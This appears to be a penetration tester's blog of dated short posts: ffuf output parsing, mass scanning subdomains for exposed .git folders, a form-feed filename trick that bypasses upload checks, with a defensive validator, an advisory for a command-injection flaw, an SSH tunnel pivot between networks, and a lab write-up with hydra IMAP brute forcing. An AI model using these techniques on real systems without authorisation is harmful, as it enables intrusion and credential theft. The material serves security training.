Wednesday, 16 September 2020

How to parse ffuf output file

# run ffuf with -o (plus your usual -u/-w options); the default output format is JSON and every hit lands in .results[]
ffuf -o output_file
# pull only the URL and status code of each hit, one JSON object per line
cat output_file | jq -c '.results[] | {url: .url, status: .status}'
# same thing over a whole directory of ffuf result files (quote $file so odd names do not break the loop)
for file in dirb/*; do cat "$file" | jq -c '.results[] | {url: .url, status: .status}'; done

Thursday, 3 September 2020

What does a quick ransomware infection of every box on the network look like? Like this


Wednesday, 26 August 2020

find .git repo!

curl -s "https://crt.sh/?q=%25.domain.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew

Friday, 3 July 2020

Form Feed U+000C

A character that sometimes lets you escape the file-extension check in web apps - •
// http://www.fileformat.info/info/unicode/char/000C/index.htm

POST /api/image_upload HTTP/1.1
Host: X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------91652467232091688581205088441
Content-Length: 631
Connection: close

Content-Disposition: form-data; name="file"; filename=".svg•.pdf"
Content-Type: application/pdf


HTTP/1.1 200 OK
Date: Fri, 03 Jul 2020 08:09:26 GMT
Server: Apache/2
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding,User-Agent
Content-Length: 21
Content-Type: text/html

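A server-side check for the upload shown above, added here as an example (it is not code from the original post). It contrasts the kind of last-dot extension check the form-feed trick is aimed at with a validator that rejects any control or format character, such as U+000C, before the extension is even looked at. The endpoint and the ALLOWED_EXTENSIONS set are assumed.

```python
import os
import unicodedata
from typing import Tuple

# Extensions this hypothetical upload endpoint is allowed to store (assumed).
ALLOWED_EXTENSIONS = {"pdf", "png", "jpg"}


def naive_extension_ok(filename: str) -> bool:
    """The weak check: only the text after the last dot is inspected,
    so '.svg\x0c.pdf' is accepted as a PDF."""
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    return ext in ALLOWED_EXTENSIONS


def validate_upload_filename(filename: str) -> Tuple[bool, str]:
    """Return (accepted, reason).

    Rejects control and format characters (Unicode categories Cc and Cf,
    which cover U+000C FORM FEED and U+0000 NUL), path separators, and any
    extension that is not on the allow list. The check runs before any
    extension parsing, so a control character can never split the name."""
    if not filename or len(filename) > 255:
        return False, "empty or overlong filename"
    for ch in filename:
        if unicodedata.category(ch) in ("Cc", "Cf"):
            return False, f"control character U+{ord(ch):04X} in filename"
    if "/" in filename or "\\" in filename or filename in (".", ".."):
        return False, "path characters in filename"
    # Require exactly name.ext: '.pdf' (empty base name) and
    # 'report.svg.pdf' (double extension) are both refused.
    parts = filename.split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "filename must be name.ext with a single extension"
    ext = parts[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension '.{ext}' not allowed"
    return True, "ok"
```

Rejecting the request outright (rather than stripping the character) also leaves a clear signal in the upload log for detection.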

Tuesday, 5 May 2020

Alcatel-Lucent Security Advisory: CVE-2020-11794 (RCE)

OTMS remote code execution

I have discovered a vulnerability in OpenTouch Multimedia Services, making it possible for an attacker with administration rights to execute code on the server via web requests with high privileges.

Description of the vulnerability

The CGI script vmconstruct.cgi is vulnerable to shell command injection through HTTP POST requests. An attacker holding an OT administrator cookie can inject arbitrary OS commands using the semicolon (;) character in the web request.


This OS command injection can give the attacker elevated shell access on the OT server.

Reference: CVE-2020-11794
Date: April 15th, 2020
Risk: High
Impact: Get access
Attack expertise: Skilled, Administrative user
Attack requirements: Remote
CVSS score: 8.0 (HIGH)

Thursday, 26 March 2020

SSH SOCKS proxy between Lan1 and Lan2

# Linux in Lan1: expose its own sshd (port 22) as port 5555 on the VPS
Linux in Lan1: ssh -R 5555:localhost:22 w4cky@VPS_IP -p 8080
# Linux in Lan2: pull that VPS port 5555 back down as local port 5000
Linux in Lan2: ssh -L 5000:localhost:5555 w4cky@VPS_IP -p 8080
# Linux in Lan2: ssh into the Lan1 box through port 5000 and open a SOCKS proxy on 1234 that exits inside Lan1
Linux in Lan2: ssh -D 1234 root@localhost -p 5000

Sunday, 22 March 2020

Lab Pentestit 14 - writeup

  1. Crack password for mail
# cat logins_mail.txt

hydra -L logins_mail.txt -P /tmp/1 imap:// -t 60 -f -I
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-12 17:45:04
[DATA] max 44 tasks per 1 server, overall 44 tasks, 44 login tries (l:4/p:11), ~1 try per task
[DATA] attacking imap://


[143][imap] host:   login: support@test.lab password: PASSWORD
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-12 17:45:12

telnet imap
Connected to
Escape character is '^]'.
a1 LOGIN support@test.lab PASSWORD
a1 OK
telnet> quit
Connection closed.

HackTheBox - Sauna - WriteUP

My log from the attack on the Sauna machine on HackTheBox.
The beginning was long. All the fun is in enumeration. Start by enumerating employee accounts; the website turns out to be useful.